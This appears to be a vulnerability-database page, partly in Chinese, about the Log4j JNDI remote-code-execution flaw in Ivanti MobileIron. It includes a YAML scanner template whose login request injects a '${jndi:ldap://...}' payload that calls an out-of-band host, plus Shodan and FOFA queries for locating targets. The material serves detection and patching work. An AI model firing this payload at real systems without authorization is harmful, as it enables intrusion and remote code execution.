ivanti-mobileiron-log4j-jndi-rce: Ivanti MobileIron Log4J JNDI RCE

日期: 2025-09-01 | 影响软件: Ivanti MobileIron | POC: 已公开

漏洞描述

Ivanti MobileIron Apache Log4j2 <=2.14.1 JNDI in features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. FOFA: MobileIron SHODAN: shodan-query: http.html:"MobileIron"

PoC代码[已公开]

id: ivanti-mobileiron-log4j-jndi-rce

info:
  name: Ivanti MobileIron Log4J JNDI RCE
  author: meme-lord
  severity: critical
  verified: true
  description: |
    Ivanti MobileIron Apache Log4j2 <=2.14.1 JNDI in features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
    FOFA: MobileIron
    SHODAN: shodan-query: http.html:"MobileIron"
  remediation: Upgrade to version 2.14.2 or higher of MobileIron. If this is not possible, several Log4j exploit workarounds are available.
  reference:
    - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
    - https://www.lunasec.io/docs/blog/log4j-zero-day/
    - https://www.zdnet.com/article/mobileiron-customers-urged-to-patch-systems-due-to-potential-log4j-exploitation/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
  tags: jndi,log4j,rce,cve,cve2021,ivanti,mobileiron
  created: 2023/07/02

set:
  rooturl: request.url
  oob: oob()
  oobDNS: oob.DNS
rules:
  r0:
    request:
      method: POST
      path: /mifs/j_spring_security_check
      headers:
        Referer: "{{rooturl}}/mifs/user/login.jsp"
      body: |
        j_username=${jndi:ldap://{{oobDNS}}}&j_password=password&logincontext=employee
    expression: oobCheck(oob, oob.ProtocolDNS, 3)
expression: r0()

相关漏洞推荐